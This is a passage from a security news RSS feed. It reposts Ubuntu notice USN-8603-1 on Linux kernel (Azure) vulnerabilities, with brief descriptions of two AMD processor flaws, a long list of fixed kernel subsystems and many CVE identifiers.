CVE-2026-31720, CVE-2026-31721, CVE-2026-31722, CVE-2026-31723,
CVE-2026-31724, CVE-2026-31725, CVE-2026-31726, CVE-2026-31728,
CVE-2026-31729, CVE-2026-31730, CVE-2026-31731, CVE-2026-31737,
CVE-2026-31738, CVE-2026-31740, CVE-2026-31741, CVE-2026-31747,
CVE-2026-31748, CVE-2026-31749, CVE-2026-31751, CVE-2026-31752,
CVE-2026-31754, CVE-2026-31755, CVE-2026-31756, CVE-2026-31758,
CVE-2026-31759, CVE-2026-31761, CVE-2026-31762, CVE-2026-31763,
CVE-2026-31767, CVE-2026-31768, CVE-2026-31770, CVE-2026-31772,
CVE-2026-31773, CVE-2026-31778, CVE-2026-31779, CVE-2026-31780,
CVE-2026-31781, CVE-2026-31788, CVE-2026-43007, CVE-2026-43011,
CVE-2026-43012, CVE-2026-43013, CVE-2026-43014, CVE-2026-43015,
CVE-2026-43016, CVE-2026-43017, CVE-2026-43018, CVE-2026-43019,
CVE-2026-43020, CVE-2026-43023, CVE-2026-43024, CVE-2026-43025,
CVE-2026-43026, CVE-2026-43027, CVE-2026-43028, CVE-2026-43030,
CVE-2026-43032, CVE-2026-43035, CVE-2026-43036, CVE-2026-43037,
CVE-2026-43038, CVE-2026-43040, CVE-2026-43041, CVE-2026-43043,
CVE-2026-43044, CVE-2026-43046, CVE-2026-43047, CVE-2026-43049,
CVE-2026-43050, CVE-2026-43051, CVE-2026-43052, CVE-2026-43054,
CVE-2026-43056, CVE-2026-43057, CVE-2026-43058, CVE-2026-43059,
CVE-2026-43060, CVE-2026-43061, CVE-2026-43062, CVE-2026-43064,
CVE-2026-43065, CVE-2026-43066, CVE-2026-43068, CVE-2026-43069,
CVE-2026-43071, CVE-2026-43072, CVE-2026-43073, CVE-2026-43074,
CVE-2026-43075, CVE-2026-43076, CVE-2026-43079, CVE-2026-43080,
CVE-2026-43081, CVE-2026-43082, CVE-2026-43085, CVE-2026-43086,
CVE-2026-43088, CVE-2026-43089, CVE-2026-43091, CVE-2026-43092,
CVE-2026-43093, CVE-2026-43094, CVE-2026-43098, CVE-2026-43099,
CVE-2026-43103, CVE-2026-43104, CVE-2026-43105, CVE-2026-43107,
CVE-2026-43109, CVE-2026-43110, CVE-2026-43111, CVE-2026-43112,
CVE-2026-43113, CVE-2026-43114, CVE-2026-43117, CVE-2026-43119,
CVE-2026-43120, CVE-2026-43123, CVE-2026-43124, CVE-2026-43128,
CVE-2026-43129, CVE-2026-43130, CVE-2026-43132, CVE-2026-43133,
CVE-2026-43134, CVE-2026-43135, CVE-2026-43136, CVE-2026-43137,
CVE-2026-43139, CVE-2026-43140, CVE-2026-43141, CVE-2026-43143,
CVE-2026-43145, CVE-2026-43147, CVE-2026-43148, CVE-2026-43149,
CVE-2026-43150, CVE-2026-43152, CVE-2026-43153, CVE-2026-43156,
CVE-2026-43157, CVE-2026-43158, CVE-2026-43159, CVE-2026-43162,
CVE-2026-43163, CVE-2026-43167, CVE-2026-43168, CVE-2026-43169,
CVE-2026-43170, CVE-2026-43171, CVE-2026-43173, CVE-2026-43175,
CVE-2026-43180, CVE-2026-43182, CVE-2026-43183, CVE-2026-43184,
CVE-2026-43185, CVE-2026-43186, CVE-2026-43187, CVE-2026-43189,
CVE-2026-43190, CVE-2026-43194, CVE-2026-43196, CVE-2026-43199,
CVE-2026-43200, CVE-2026-43201, CVE-2026-43202, CVE-2026-43203,
CVE-2026-43205, CVE-2026-43206, CVE-2026-43207, CVE-2026-43209,
CVE-2026-43211, CVE-2026-43214, CVE-2026-43215, CVE-2026-43218,
CVE-2026-43221, CVE-2026-43222, CVE-2026-43223, CVE-2026-43225,
CVE-2026-43226, CVE-2026-43227, CVE-2026-43230, CVE-2026-43231,
CVE-2026-43232, CVE-2026-43233, CVE-2026-43236, CVE-2026-43238,
CVE-2026-43239, CVE-2026-43241, CVE-2026-43242, CVE-2026-43244,
CVE-2026-43245, CVE-2026-43246, CVE-2026-43248, CVE-2026-43249,
CVE-2026-43250, CVE-2026-43251, CVE-2026-43252, CVE-2026-43253,
CVE-2026-43255, CVE-2026-43256, CVE-2026-43257, CVE-2026-43261,
CVE-2026-43262, CVE-2026-43264, CVE-2026-43265, CVE-2026-43266,
CVE-2026-43268, CVE-2026-43269, CVE-2026-43270, CVE-2026-43271,
CVE-2026-43273, CVE-2026-43275, CVE-2026-43277, CVE-2026-43278,
CVE-2026-43279, CVE-2026-43281, CVE-2026-43283, CVE-2026-43287,
CVE-2026-43288, CVE-2026-43289, CVE-2026-43291, CVE-2026-43295,
CVE-2026-43296, CVE-2026-43297, CVE-2026-43300, CVE-2026-43302,
CVE-2026-43304, CVE-2026-43312, CVE-2026-43313, CVE-2026-43314,
CVE-2026-43315, CVE-2026-43316, CVE-2026-43317, CVE-2026-43318,
CVE-2026-43319, CVE-2026-43320, CVE-2026-43324, CVE-2026-43327,
CVE-2026-43328, CVE-2026-43329, CVE-2026-43330, CVE-2026-43332,
CVE-2026-43333, CVE-2026-43334, CVE-2026-43336, CVE-2026-43338,
CVE-2026-43339, CVE-2026-43340, CVE-2026-43341, CVE-2026-43342,
CVE-2026-43343, CVE-2026-43345, CVE-2026-43350, CVE-2026-43355,
CVE-2026-43357, CVE-2026-43359, CVE-2026-43360, CVE-2026-43361,
CVE-2026-43363, CVE-2026-43365, CVE-2026-43366, CVE-2026-43368,
CVE-2026-43370, CVE-2026-43372, CVE-2026-43373, CVE-2026-43377,
CVE-2026-43378, CVE-2026-43380, CVE-2026-43381, CVE-2026-43382,
CVE-2026-43383, CVE-2026-43384, CVE-2026-43386, CVE-2026-43387,
CVE-2026-43395, CVE-2026-43397, CVE-2026-43405, CVE-2026-43406,
CVE-2026-43407, CVE-2026-43408, CVE-2026-43409, CVE-2026-43411,
CVE-2026-43412, CVE-2026-43413, CVE-2026-43414, CVE-2026-43415,
CVE-2026-43419, CVE-2026-43420, CVE-2026-43421, CVE-2026-43424,
CVE-2026-43425, CVE-2026-43426, CVE-2026-43427, CVE-2026-43428,
CVE-2026-43429, CVE-2026-43430, CVE-2026-43432, CVE-2026-43436,
CVE-2026-43437, CVE-2026-43439, CVE-2026-43441, CVE-2026-43445,
CVE-2026-43448, CVE-2026-43449, CVE-2026-43450, CVE-2026-43451,
CVE-2026-43452, CVE-2026-43453, CVE-2026-43455, CVE-2026-43456,
CVE-2026-43457, CVE-2026-43458, CVE-2026-43459, CVE-2026-43466,
CVE-2026-43467, CVE-2026-43468, CVE-2026-43469, CVE-2026-43471,
CVE-2026-43472, CVE-2026-43473, CVE-2026-43475, CVE-2026-43476,
CVE-2026-43480, CVE-2026-43483, CVE-2026-43484, CVE-2026-43488,
CVE-2026-43490, CVE-2026-43491, CVE-2026-43492, CVE-2026-43493,
CVE-2026-43495, CVE-2026-43496, CVE-2026-43497, CVE-2026-43499,
CVE-2026-43501, CVE-2026-43502, CVE-2026-45834, CVE-2026-45835,
CVE-2026-45836, CVE-2026-45838, CVE-2026-45839, CVE-2026-45840,
CVE-2026-45841, CVE-2026-45842, CVE-2026-45843, CVE-2026-45844,
CVE-2026-45845, CVE-2026-45846, CVE-2026-45847, CVE-2026-45848,
CVE-2026-45849, CVE-2026-45851, CVE-2026-45852, CVE-2026-45855,
CVE-2026-45856, CVE-2026-45857, CVE-2026-45858, CVE-2026-45859,
CVE-2026-45860, CVE-2026-45861, CVE-2026-45862, CVE-2026-45864,
CVE-2026-45865, CVE-2026-45866, CVE-2026-45867, CVE-2026-45868,
CVE-2026-45869, CVE-2026-45870, CVE-2026-45871, CVE-2026-45872,
CVE-2026-45873, CVE-2026-45875, CVE-2026-45877, CVE-2026-45878,
CVE-2026-45879, CVE-2026-45880, CVE-2026-45881, CVE-2026-45882,
CVE-2026-45883, CVE-2026-45884, CVE-2026-45885, CVE-2026-45886,
CVE-2026-45890, CVE-2026-45891, CVE-2026-45893, CVE-2026-45895,
CVE-2026-45899, CVE-2026-45902, CVE-2026-45904, CVE-2026-45905,
CVE-2026-45910, CVE-2026-45911, CVE-2026-45912, CVE-2026-45913,
CVE-2026-45914, CVE-2026-45915, CVE-2026-45916, CVE-2026-45917,
CVE-2026-45919, CVE-2026-45920, CVE-2026-45921, CVE-2026-45923,
CVE-2026-45924, CVE-2026-45928, CVE-2026-45935, CVE-2026-45936,
CVE-2026-45938, CVE-2026-45941, CVE-2026-45942, CVE-2026-45943,
CVE-2026-45946, CVE-2026-45947, CVE-2026-45948, CVE-2026-45954,
CVE-2026-45956, CVE-2026-45957, CVE-2026-45958, CVE-2026-45960,
CVE-2026-45962, CVE-2026-45964, CVE-2026-45965, CVE-2026-45968,
CVE-2026-45969, CVE-2026-45970, CVE-2026-45972, CVE-2026-45973,
CVE-2026-45974, CVE-2026-45976, CVE-2026-45978, CVE-2026-45981,
CVE-2026-45982, CVE-2026-45983, CVE-2026-45984, CVE-2026-45985,
CVE-2026-45986, CVE-2026-45987, CVE-2026-45988, CVE-2026-45989,
CVE-2026-45991, CVE-2026-45994, CVE-2026-45996, CVE-2026-45997,
CVE-2026-45999, CVE-2026-46002, CVE-2026-46003, CVE-2026-46004,
CVE-2026-46005, CVE-2026-46006, CVE-2026-46007, CVE-2026-46009,
CVE-2026-46011, CVE-2026-46012, CVE-2026-46015, CVE-2026-46016,
CVE-2026-46018, CVE-2026-46019, CVE-2026-46021, CVE-2026-46022,
CVE-2026-46023, CVE-2026-46024, CVE-2026-46026, CVE-2026-46027,
CVE-2026-46031, CVE-2026-46033, CVE-2026-46037, CVE-2026-46038,
CVE-2026-46040, CVE-2026-46041, CVE-2026-46043, CVE-2026-46044,
CVE-2026-46046, CVE-2026-46047, CVE-2026-46049, CVE-2026-46050,
CVE-2026-46051, CVE-2026-46052, CVE-2026-46053, CVE-2026-46056,
CVE-2026-46058, CVE-2026-46061, CVE-2026-46062, CVE-2026-46063,
CVE-2026-46064, CVE-2026-46065, CVE-2026-46068, CVE-2026-46069,
CVE-2026-46070, CVE-2026-46072, CVE-2026-46073, CVE-2026-46075,
CVE-2026-46076, CVE-2026-46077, CVE-2026-46078, CVE-2026-46079,
CVE-2026-46080, CVE-2026-46082, CVE-2026-46083, CVE-2026-46084,
CVE-2026-46086, CVE-2026-46088, CVE-2026-46089, CVE-2026-46090,
CVE-2026-46091, CVE-2026-46092, CVE-2026-46094, CVE-2026-46098,
CVE-2026-46099, CVE-2026-46101, CVE-2026-46102, CVE-2026-46103,
CVE-2026-46106, CVE-2026-46107, CVE-2026-46108, CVE-2026-46110,
CVE-2026-46111, CVE-2026-46112, CVE-2026-46113, CVE-2026-46114,
CVE-2026-46115, CVE-2026-46116, CVE-2026-46117, CVE-2026-46119,
CVE-2026-46120, CVE-2026-46121, CVE-2026-46122, CVE-2026-46123,
CVE-2026-46124, CVE-2026-46125, CVE-2026-46126, CVE-2026-46127,
CVE-2026-46128, CVE-2026-46129, CVE-2026-46131, CVE-2026-46132,
CVE-2026-46133, CVE-2026-46135, CVE-2026-46136, CVE-2026-46137,
CVE-2026-46138, CVE-2026-46139, CVE-2026-46142, CVE-2026-46143,
CVE-2026-46144, CVE-2026-46145, CVE-2026-46146, CVE-2026-46149,
CVE-2026-46150, CVE-2026-46151, CVE-2026-46152, CVE-2026-46157,
CVE-2026-46159, CVE-2026-46160, CVE-2026-46161, CVE-2026-46163,
CVE-2026-46164, CVE-2026-46167, CVE-2026-46168, CVE-2026-46169,
CVE-2026-46172, CVE-2026-46173, CVE-2026-46174, CVE-2026-46176,
CVE-2026-46177, CVE-2026-46178, CVE-2026-46179, CVE-2026-46180,
CVE-2026-46184, CVE-2026-46185, CVE-2026-46186, CVE-2026-46187,
CVE-2026-46189, CVE-2026-46190, CVE-2026-46191, CVE-2026-46193,
CVE-2026-46194, CVE-2026-46195, CVE-2026-46196, CVE-2026-46197,
CVE-2026-46198, CVE-2026-46199, CVE-2026-46200, CVE-2026-46201,
CVE-2026-46204, CVE-2026-46205, CVE-2026-46206, CVE-2026-46207,
CVE-2026-46208, CVE-2026-46209, CVE-2026-46211, CVE-2026-46212,
CVE-2026-46214, CVE-2026-46218, CVE-2026-46219, CVE-2026-46220,
CVE-2026-46225, CVE-2026-46226, CVE-2026-46227, CVE-2026-46229,
CVE-2026-46230, CVE-2026-46231, CVE-2026-46232, CVE-2026-46233,
CVE-2026-46234, CVE-2026-46235, CVE-2026-46236, CVE-2026-46238,
CVE-2026-46241, CVE-2026-46243, CVE-2026-46244, CVE-2026-46246,
CVE-2026-46247, CVE-2026-46249, CVE-2026-46250, CVE-2026-46251,
CVE-2026-46253, CVE-2026-46254, CVE-2026-46255, CVE-2026-46259,
CVE-2026-46260, CVE-2026-46261, CVE-2026-46265, CVE-2026-46266,
CVE-2026-46267, CVE-2026-46270, CVE-2026-46273, CVE-2026-46274,
CVE-2026-46280, CVE-2026-46282, CVE-2026-46285, CVE-2026-46286,
CVE-2026-46287, CVE-2026-46289, CVE-2026-46291, CVE-2026-46292,
CVE-2026-46293, CVE-2026-46294, CVE-2026-46296, CVE-2026-46299,
CVE-2026-46301, CVE-2026-46303, CVE-2026-46304, CVE-2026-46306,
CVE-2026-46307, CVE-2026-46312, CVE-2026-46314, CVE-2026-46319,
CVE-2026-46328, CVE-2026-52911, CVE-2026-52920, CVE-2026-52925,
CVE-2026-52933, CVE-2026-52936, CVE-2026-52951, CVE-2026-52954,
CVE-2026-52955, CVE-2026-52957, CVE-2026-52958, CVE-2026-52961,
CVE-2026-52962, CVE-2026-52963, CVE-2026-52964, CVE-2026-52967,
CVE-2026-52968, CVE-2026-52969, CVE-2026-52970, CVE-2026-52974,
CVE-2026-52975, CVE-2026-52977, CVE-2026-52981, CVE-2026-52982,
CVE-2026-52984, CVE-2026-52985, CVE-2026-52986, CVE-2026-52989,
CVE-2026-52990, CVE-2026-52992, CVE-2026-52993, CVE-2026-52995,
CVE-2026-52998, CVE-2026-52999, CVE-2026-53001, CVE-2026-53002,
CVE-2026-53003, CVE-2026-53004, CVE-2026-53006, CVE-2026-53011,
CVE-2026-53012, CVE-2026-53013, CVE-2026-53014, CVE-2026-53015,
CVE-2026-53016, CVE-2026-53021, CVE-2026-53022, CVE-2026-53023,
CVE-2026-53032, CVE-2026-53033, CVE-2026-53034, CVE-2026-53035,
CVE-2026-53036, CVE-2026-53037, CVE-2026-53039, CVE-2026-53040,
CVE-2026-53041, CVE-2026-53043, CVE-2026-53045, CVE-2026-53046,
CVE-2026-53047, CVE-2026-53048, CVE-2026-53049, CVE-2026-53050,
CVE-2026-53052, CVE-2026-53056, CVE-2026-53058, CVE-2026-53059,
CVE-2026-53060, CVE-2026-53061, CVE-2026-53062, CVE-2026-53063,
CVE-2026-53064, CVE-2026-53065, CVE-2026-53066, CVE-2026-53068,
CVE-2026-53069, CVE-2026-53071, CVE-2026-53072, CVE-2026-53073,
CVE-2026-53074, CVE-2026-53075, CVE-2026-53076, CVE-2026-53077,
CVE-2026-53082, CVE-2026-53083, CVE-2026-53084, CVE-2026-53085,
CVE-2026-53086, CVE-2026-53088, CVE-2026-53093, CVE-2026-53094,
CVE-2026-53096, CVE-2026-53097, CVE-2026-53098, CVE-2026-53110,
CVE-2026-53111, CVE-2026-53112, CVE-2026-53115, CVE-2026-53117,
CVE-2026-53122, CVE-2026-53123, CVE-2026-53126, CVE-2026-53128,
CVE-2026-53130, CVE-2026-53279, CVE-2026-53287, CVE-2026-53289,
CVE-2026-53291, CVE-2026-53293, CVE-2026-53294, CVE-2026-53295,
CVE-2026-53296, CVE-2026-53303, CVE-2026-53304, CVE-2026-53306,
CVE-2026-53309, CVE-2026-53314, CVE-2026-53320, CVE-2026-53369,
CVE-2026-53374, CVE-2026-53375, CVE-2026-53376, CVE-2026-53379,
CVE-2026-63838, CVE-2026-63843, CVE-2026-63844, CVE-2026-63845,
CVE-2026-63846, CVE-2026-63847, CVE-2026-63848, CVE-2026-63851,
CVE-2026-63852, CVE-2026-63854, CVE-2026-63855, CVE-2026-63856,
CVE-2026-63860, CVE-2026-63861, CVE-2026-63862, CVE-2026-63865,
CVE-2026-64018, CVE-2026-64034, CVE-2026-64164)]]></content:encoded>
</item>
<item>
<title><![CDATA[USN-8603-1: Linux kernel (Azure) vulnerabilities]]></title>
<description><![CDATA[It was discovered that some AMD processors did not properly clear data in
the floating point divider unit during speculative execution. A local
attacker could use this to expose sensitive information. (CVE-2025-54505)

It was discovered that some AMD Zen 2 processors did not properly isolate
shar...]]></description>
<link>https://tsecurity.de/de/3691319/unix-server/usn-8603-1-linux-kernel-azure-vulnerabilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691319/unix-server/usn-8603-1-linux-kernel-azure-vulnerabilities/</guid>
<pubDate>Fri, 24 Jul 2026 13:02:31 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[It was discovered that some AMD processors did not properly clear data in
the floating point divider unit during speculative execution. A local
attacker could use this to expose sensitive information. (CVE-2025-54505)

It was discovered that some AMD Zen 2 processors did not properly isolate
shared resources in the operation cache. A local attacker could possibly
use this issue to corrupt instructions executed at a higher privilege
level, resulting in privilege escalation. (CVE-2025-54518)

Several security issues were discovered in the Linux kernel.
An attacker could possibly use these to compromise the system.
This update corrects flaws in the following subsystems:
  - x86 platform drivers;
  - PSP security protocol;
  - ARM32 architecture;
  - ARM64 architecture;
  - MIPS architecture;
  - PowerPC architecture;
  - RISC-V architecture;
  - S390 architecture;
  - User-Mode Linux (UML);
  - x86 architecture;
  - Block layer subsystem;
  - Cryptographic API;
  - Intel NPU Driver;
  - Compute Acceleration Framework;
  - ACPI drivers;
  - Auxiliary display drivers;
  - Drivers core;
  - DRBD Distributed Replicated Block Device drivers;
  - Rados block device (RBD) driver;
  - Ublk userspace block driver;
  - Compressed RAM block device driver;
  - Bluetooth drivers;
  - Bus devices;
  - Character device driver;
  - TPM device driver;
  - Clock framework and drivers;
  - CPU frequency scaling framework;
  - Hardware crypto device drivers;
  - Buffer Sharing and Synchronization framework;
  - DPLL subsystem;
  - EDAC drivers;
  - Arm Firmware Framework for ARMv8-A(FFA);
  - EFI core;
  - FWCTL subsystem;
  - GPIO subsystem;
  - GPU drivers;
  - Greybus drivers;
  - HID subsystem;
  - Microsoft Hyper-V drivers;
  - Hardware monitoring drivers;
  - I2C subsystem;
  - I3C subsystem;
  - IIO ADC drivers;
  - IIO subsystem;
  - InfiniBand drivers;
  - Input Device core drivers;
  - IOMMU subsystem;
  - LED subsystem;
  - Mailbox framework;
  - Multiple devices driver;
  - Media drivers;
  - NVIDIA Tegra memory controller driver;
  - IBM Advanced System Management driver;
  - MTD block device drivers;
  - Network drivers;
  - Ethernet bonding driver;
  - Mellanox network drivers;
  - Microsoft Azure Network Adapter (MANA) driver;
  - STMicroelectronics network drivers;
  - Texas Instruments network drivers;
  - MediaTek network drivers;
  - NTB driver;
  - NVME drivers;
  - Device tree and open firmware driver;
  - Parport drivers;
  - PCI subsystem;
  - Pin controllers subsystem;
  - Chrome hardware platform drivers;
  - ACPI WMI driver;
  - Generic PM domains;
  - MediaTek PM domains;
  - Power supply drivers;
  - Remote Processor subsystem;
  - MPAM driver;
  - Amlogic Meson reset controller drivers;
  - S/390 drivers;
  - SCSI subsystem;
  - NVIDIA Tegra Control Backbone (CBB) driver;
  - SPI subsystem;
  - Greybus lights staging drivers;
  - Media staging drivers;
  - Realtek RTL8723BS SDIO drivers;
  - SM750 framebuffer staging driver;
  - TCM subsystem;
  - Thermal drivers;
  - Thunderbolt and USB4 drivers;
  - TTY drivers;
  - Userspace I/O drivers;
  - USB Device Class drivers;
  - ULPI bus;
  - DesignWare USB2 driver;
  - USB Gadget drivers;
  - USB Dual Role (OTG-ready) Controller drivers;
  - USB Serial drivers;
  - USB Type-C support driver;
  - USB Type-C Port Controller Manager driver;
  - TI TPS6598x USB Power Delivery controller driver;
  - USB Type-C Connector System Software Interface driver;
  - USB over IP driver;
  - vDPA drivers;
  - VFIO drivers;
  - Framebuffer layer;
  - TSM AMD SEV Guest driver;
  - Xen hypervisor drivers;
  - 9P distributed file system;
  - File systems infrastructure;
  - AFS file system;
  - BTRFS file system;
  - Ceph distributed file system;
  - EROFS file system;
  - Ext4 file system;
  - F2FS file system;
  - FUSE (File system in Userspace);
  - GFS2 file system;
  - HFS+ file system;
  - HugeTLB file system;
  - Journaling layer for block devices (JBD2);
  - Network file systems library;
  - Network file system (NFS) server daemon;
  - NILFS2 file system;
  - File system notification infrastructure;
  - NTFS3 file system;
  - OCFS2 file system;
  - Overlay file system;
  - Diskquota system;
  - SMB network file system;
  - Tracing file system;
  - UDF file system;
  - XFS file system;
  - DRM TTM subsystem;
  - Codetag library;
  - Control group (cgroup);
  - Kernel CPU control infrastructure;
  - Memory management;
  - Tracing infrastructure;
  - QorIQ DPAA2 FSL-MC bus driver;
  - Freescale ENETC Ethernet drivers;
  - Memory Management;
  - KVM subsystem;
  - Linked list library;
  - Netfilter;
  - padata parallel execution mechanism;
  - PPP protocol drivers and compressors;
  - Bluetooth subsystem;
  - Networking core;
  - Network shaper API;
  - Network traffic control;
  - TCP network protocol;
  - XFRM subsystem;
  - User-space API (UAPI);
  - io_uring subsystem;
  - IPC subsystem;
  - Audit subsystem;
  - BPF subsystem;
  - DMA mapping infrastructure;
  - Kernel exit() syscall;
  - Kernel fork() syscall;
  - Kernel futex primitives;
  - IRQ subsystem;
  - Kexec HandOver (KHO);
  - Locking primitives;
  - Padata parallel execution mechanism;
  - Scheduler infrastructure;
  - Timer subsystem;
  - Cryptographic library;
  - Scatterlist API;
  - Heterogeneous memory management;
  - KProbes tracing;
  - KASAN memory debugging framework;
  - 802.1Q VLAN protocol;
  - B.A.T.M.A.N. meshing protocol;
  - Ethernet bridge;
  - CAIF protocol;
  - CAN network layer;
  - Ceph Core library;
  - Distributed Switch Architecture;
  - Ethtool driver;
  - Handshake API;
  - HSR network protocol;
  - IPv4 networking;
  - IPv6 networking;
  - IUCV driver;
  - L2TP protocol;
  - MAC80211 subsystem;
  - Multipath TCP;
  - NFC subsystem;
  - Open vSwitch;
  - Packet sockets;
  - Phonet protocol;
  - Qualcomm IPC Router (QRTR);
  - RDS protocol;
  - RxRPC session sockets;
  - SCTP protocol;
  - SMC sockets;
  - Stream parser;
  - TIPC protocol;
  - TLS protocol;
  - Unix domain sockets;
  - VMware vSockets driver;
  - Wireless networking;
  - Integrity Measurement Architecture(IMA) framework;
  - Key management;
  - Landlock security;
  - Linux Security Modules (LSM) Framework;
  - SELinux security module;
  - ALSA framework;
  - Generic PCM loopback sound driver;
  - FireWire sound drivers;
  - HD-audio driver;
  - AudioScience HPI driver;
  - Creative Sound Blaster X-Fi driver;
  - FourSemi audio codecs;
  - Texas InstrumentS Audio (ASoC/HDA) drivers;
  - QCOM ASoC drivers;
  - Renesas ASoC drivers;
  - SOF drivers;
  - STI ASoC drivers;
  - USB sound devices;
  - Objtool;
(CVE-2026-31532, CVE-2026-31574, CVE-2026-31575, CVE-2026-31576,
CVE-2026-31577, CVE-2026-31578, CVE-2026-31579, CVE-2026-31580,
CVE-2026-31581, CVE-2026-31582, CVE-2026-31583, CVE-2026-31584,
CVE-2026-31585, CVE-2026-31586, CVE-2026-31587, CVE-2026-31588,
CVE-2026-31589, CVE-2026-31590, CVE-2026-31591, CVE-2026-31592,
CVE-2026-31593, CVE-2026-31594, CVE-2026-31595, CVE-2026-31596,
CVE-2026-31597, CVE-2026-31598, CVE-2026-31599, CVE-2026-31600,
CVE-2026-31601, CVE-2026-31602, CVE-2026-31603, CVE-2026-31604,
CVE-2026-31605, CVE-2026-31606, CVE-2026-31607, CVE-2026-31608,
CVE-2026-31609, CVE-2026-31610, CVE-2026-31611, CVE-2026-31612,
CVE-2026-31613, CVE-2026-31614, CVE-2026-31615, CVE-2026-31616,
CVE-2026-31617, CVE-2026-31618, CVE-2026-31619, CVE-2026-31620,
CVE-2026-31621, CVE-2026-31622, CVE-2026-31623, CVE-2026-31624,
CVE-2026-31625, CVE-2026-31626, CVE-2026-31627, CVE-2026-31628,
CVE-2026-31629, CVE-2026-31686, CVE-2026-31694, CVE-2026-31696,
CVE-2026-31697, CVE-2026-31698, CVE-2026-31699, CVE-2026-31700,
CVE-2026-31701, CVE-2026-31702, CVE-2026-31703, CVE-2026-31704,
CVE-2026-31705, CVE-2026-31706, CVE-2026-31707, CVE-2026-31708,
CVE-2026-31709, CVE-2026-31710, CVE-2026-31711, CVE-2026-31712,
CVE-2026-31713, CVE-2026-31714, CVE-2026-31715, CVE-2026-31716,
CVE-2026-31717, CVE-2026-31718, CVE-2026-31719, CVE-2026-43058,
CVE-2026-43071, CVE-2026-43072, CVE-2026-43073, CVE-2026-43348,
CVE-2026-43349, CVE-2026-43350, CVE-2026-43490, CVE-2026-43491,
CVE-2026-43492, CVE-2026-43493, CVE-2026-43495, CVE-2026-43496,
CVE-2026-43497, CVE-2026-43498, CVE-2026-43499, CVE-2026-43501,
CVE-2026-43502, CVE-2026-45834, CVE-2026-45835, CVE-2026-45836,
CVE-2026-45837, CVE-2026-45838, CVE-2026-45839, CVE-2026-45840,
CVE-2026-45841, CVE-2026-45842, CVE-2026-45843, CVE-2026-45844,
CVE-2026-45845, CVE-2026-45846, CVE-2026-45986, CVE-2026-45987,
CVE-2026-45988, CVE-2026-45989, CVE-2026-45990, CVE-2026-45991,
CVE-2026-45994, CVE-2026-45995, CVE-2026-45996, CVE-2026-45997,
CVE-2026-45999, CVE-2026-46001, CVE-2026-46002, CVE-2026-46003,
CVE-2026-46004, CVE-2026-46005, CVE-2026-46006, CVE-2026-46007,
CVE-2026-46008, CVE-2026-46009, CVE-2026-46010, CVE-2026-46011,
CVE-2026-46012, CVE-2026-46013, CVE-2026-46014, CVE-2026-46015,
CVE-2026-46016, CVE-2026-46018, CVE-2026-46019, CVE-2026-46020,
CVE-2026-46021, CVE-2026-46022, CVE-2026-46023, CVE-2026-46024,
CVE-2026-46025, CVE-2026-46026, CVE-2026-46027, CVE-2026-46028,
CVE-2026-46029, CVE-2026-46030, CVE-2026-46031, CVE-2026-46032,
CVE-2026-46033, CVE-2026-46034, CVE-2026-46035, CVE-2026-46036,
CVE-2026-46037, CVE-2026-46038, CVE-2026-46039, CVE-2026-46040,
CVE-2026-46041, CVE-2026-46042, CVE-2026-46043, CVE-2026-46044,
CVE-2026-46045, CVE-2026-46046, CVE-2026-46047, CVE-2026-46049,
CVE-2026-46050, CVE-2026-46051, CVE-2026-46052, CVE-2026-46053,
CVE-2026-46054, CVE-2026-46056, CVE-2026-46057, CVE-2026-46058,
CVE-2026-46059, CVE-2026-46060, CVE-2026-46061, CVE-2026-46062,
CVE-2026-46063, CVE-2026-46064, CVE-2026-46065, CVE-2026-46066,
CVE-2026-46067, CVE-2026-46068, CVE-2026-46069, CVE-2026-46070,
CVE-2026-46071, CVE-2026-46072, CVE-2026-46073, CVE-2026-46074,
CVE-2026-46075, CVE-2026-46076, CVE-2026-46077, CVE-2026-46078,
CVE-2026-46079, CVE-2026-46080, CVE-2026-46081, CVE-2026-46082,
CVE-2026-46083, CVE-2026-46084, CVE-2026-46085, CVE-2026-46086,
CVE-2026-46087, CVE-2026-46088, CVE-2026-46089, CVE-2026-46090,
CVE-2026-46091, CVE-2026-46092, CVE-2026-46093, CVE-2026-46094,
CVE-2026-46095, CVE-2026-46096, CVE-2026-46097, CVE-2026-46098,
CVE-2026-46099, CVE-2026-46100, CVE-2026-46101, CVE-2026-46102,
CVE-2026-46103, CVE-2026-46104, CVE-2026-46105, CVE-2026-46106,
CVE-2026-46107, CVE-2026-46108, CVE-2026-46109, CVE-2026-46110,
CVE-2026-46111, CVE-2026-46112, CVE-2026-46113, CVE-2026-46114,
CVE-2026-46115, CVE-2026-46116, CVE-2026-46117, CVE-2026-46118,
CVE-2026-46119, CVE-2026-46120, CVE-2026-46121, CVE-2026-46122,
CVE-2026-46123, CVE-2026-46124, CVE-2026-46125, CVE-2026-46126,
CVE-2026-46127, CVE-2026-46128, CVE-2026-46129, CVE-2026-46130,
CVE-2026-46131, CVE-2026-46132, CVE-2026-46133, CVE-2026-46134,
CVE-2026-46135, CVE-2026-46136, CVE-2026-46137, CVE-2026-46138,
CVE-2026-46139, CVE-2026-46140, CVE-2026-46141, CVE-2026-46142,
CVE-2026-46143, CVE-2026-46144, CVE-2026-46145, CVE-2026-46146,
CVE-2026-46147, CVE-2026-46148, CVE-2026-46149, CVE-2026-46150,
CVE-2026-46151, CVE-2026-46152, CVE-2026-46153, CVE-2026-46154,
CVE-2026-46155, CVE-2026-46156, CVE-2026-46157, CVE-2026-46158,
CVE-2026-46159, CVE-2026-46160, CVE-2026-46161, CVE-2026-46162,
CVE-2026-46163, CVE-2026-46164, CVE-2026-46165, CVE-2026-46166,
CVE-2026-46167, CVE-2026-46168, CVE-2026-46169, CVE-2026-46170,
CVE-2026-46171, CVE-2026-46172, CVE-2026-46173, CVE-2026-46174,
CVE-2026-46175, CVE-2026-46176, CVE-2026-46177, CVE-2026-46178,
CVE-2026-46179, CVE-2026-46180, CVE-2026-46181, CVE-2026-46182,
CVE-2026-46183, CVE-2026-46184, CVE-2026-46185, CVE-2026-46186,
CVE-2026-46187, CVE-2026-46188, CVE-2026-46189, CVE-2026-46190,
CVE-2026-46191, CVE-2026-46192, CVE-2026-46193, CVE-2026-46194,
CVE-2026-46195, CVE-2026-46196, CVE-2026-46197, CVE-2026-46198,
CVE-2026-46199, CVE-2026-46200, CVE-2026-46201, CVE-2026-46202,
CVE-2026-46203, CVE-2026-46204, CVE-2026-46205, CVE-2026-46206,
CVE-2026-46207, CVE-2026-46208, CVE-2026-46209, CVE-2026-46210,
CVE-2026-46211, CVE-2026-46212, CVE-2026-46213, CVE-2026-46214,
